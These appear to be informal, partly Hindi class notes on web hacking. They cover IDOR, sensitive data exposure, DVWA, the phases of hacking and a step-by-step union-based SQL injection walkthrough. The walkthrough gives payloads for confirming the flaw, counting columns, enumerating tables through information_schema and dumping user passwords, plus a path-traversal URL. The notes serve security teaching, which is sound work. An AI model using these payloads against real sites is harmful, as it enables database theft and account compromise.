Session:10 union based sql injection

1. Insecure Direct Object Reference
2. ================================
3. Dirctly accessing the unsecured files and configurations and settings which are neither authorized nor validated by the administrator.
4.  
5. home ---> www.bankudao.com/...../php?id=home
6. user profile --> www.bankudao.com/...../php?id=user_profile
7. profile setting ---> www.bankudao.com/...../php?id=profile_setting
8.  
9.  
10. www.facebook.com/sidigudiluv/....?id=AviTathgur
11. www.facebook.com/sidigudiluv/....?id=YashTathgur
12.  
13. www.facebook.com/AviTathgur
14.  
15.  
16. pages which are not allowed to normal user to go.....
17. www.bankudalo.com/user+profile
18. /../settings/config.html
19.  
20.  
21.  
22.  
23. site: demo.testfire.net ---> test
24. lucideus --> testphp.vulnweb
25.  
26.  
27.  
28. IBM appscan
29. http://demo.testfire.net/default.aspx?content=personal_deposit.htm
30.  
31. http://demo.testfire.net/default.aspx?content=../default.aspx.cs%00.html
32.  
33.  
34. Sensetive Data Exposure
35. =======================
36. hamara sensative data sabko dekhana.....
37. 1. userid and password
38. 2. Personal Information --> Address, Phone number, SSN
39. 3. Banking Information --> Account Number, Card Number, Black money
40. 4. Health Information --> insurance
41.  
42. via these information we can even bankrupt Donald Trump, Bill gates, Mark Zx,xmxmxm
43.  
44. 1. Week Security Configuration --> SQL Injection, intercepting
45. 2. Week Cryptography --> SQL Injection
46.  
47.  
48. DVWA --> Damn Vulnerable Web Application
49. ========================================
50. Vulnerable application... by default ---> test --> application's security---> hackable very easily....
51.  
52.  
53.  
54.  
55. 5 Phases of Hacking
56. ===================
57. 1. Information Gathering
58. 2. Scanning
59. 3. Gaining Access
60. 4. Maintaining Access
61. 5. Clearing Tracks
62.  
63.  
64.  
65.  
66.  
67.  
68. SQL --> Structured Query Language
69. =================================
70. User to database interaction ----
71. IRCTC ----> Book Tickets
72. Login id, Password
73. Date, Location, Destination
74.  
75. Select Trains from batabase where date="" and location="" and destication=""
76.  
77. It is a database programming language in which we communicate with the database in the form of a querry.,...
78. ticket counter ---> querry----> computer p kuch command ---> enter ---> command --> database ---> answer
79.  
80. SQL Injection
81. =============
82. Querry which are harmful and can give the juicy data from the database----> me koi query fire krta hu.... result is username and password
83.  
84. select username and password from IrctcDatabase;
85.  
86.  
87.  
88.  
89. SQL Injection --> UNION BASED
90.  
91. 1. to find the GET method
92. something=something
93.  
94. php?id=1
95. php?cat=34
96. php?cat=miaKhalifa
97. php?sunny=khalifa
98.  
99. 2. To check the vulnerability
100. id=1'
101. it will give me an error... which confirms that the site is vulnerable to sql injection.
102.  
103. 3. Now i will check the numnber of columns in the database
104. order by 1--+
105. order by 2--+
106. order by 3--+
107.  
108. 4. I will ask him to merge all the columns and show the data to me
109. union select all 1,2--
110.  
111. 5. Now i will check the version and database of the website
112. union select all 1,version()-- ----> for checking the version
113. union select all 1,database()-- ----> for checking the database
114.  
115. 6. let's call database ke maa ---> information_schema
116. union all select 1, table_names from information_schema.tables--
117. we will get the list of all the tables present inside the database
118.  
119. 7. Now i will explore the particular table---> users
120. union all select 1, column_name from information_schema.columns where table_name="users"--
121.  
122. user_id, first_name, last_name,user,password
123.  
124. 8. Now i will exploit the final table of the users
125. union all select 1, group_concat(user_id, first_name, last_name, user, password) from users--